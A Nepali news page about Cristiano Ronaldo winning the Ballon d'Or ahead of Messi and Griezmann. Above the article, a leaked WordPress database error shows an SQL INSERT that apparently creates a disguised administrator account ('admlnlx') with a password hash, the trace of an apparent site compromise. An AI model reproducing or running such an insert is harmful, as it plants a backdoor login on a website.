WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtOk75cVwYs67v8tkJFCor7ikAIITM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:54:21', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २८–
बार्सिलोनाका अर्जेन्टिनी स्टार लिओनल मेस्सीलाई पछि पार्दै रियल मड्रिडका पोर्चुगिज स्ट्राइकर क्रिष्टियानो रोनाल्डोले प्रतिष्ठित बालोन डि’ओर अवार्ड जितेका छन् । मेस्सी दोस्रो र फ्रान्सका एन्टोनी ग्रिजम्यान तेस्रो स्थानमा रहे।
३१ वर्षे रोनाल्डोको यो चौथो बालोन डि’ओर हो । उनले २००८, ०१३, ०१४ र यो वर्ष जितेका थिए। यस्तै मेस्सीले भने सन् २००९ देखि लगातार चार वर्षसहित गत वर्षसमेत गरेर पाँचौपटक जितेका थिए।
गत वर्ष रियल मड्रिडबाट च्याम्पियन्स लिग जितेका रोनाल्डोले पोर्चुगललाई युरो कप जिताएका थिए।
पछिल्लो ६ वर्ष यो अवार्ड फिफा र फ्रान्स फुटबल मिलेर प्रदान गरिएको थियो । तर, यो वर्षबाट फिफाले बर्ष खेलाडी अवार्ड प्रदान गर्ने भएको छ ।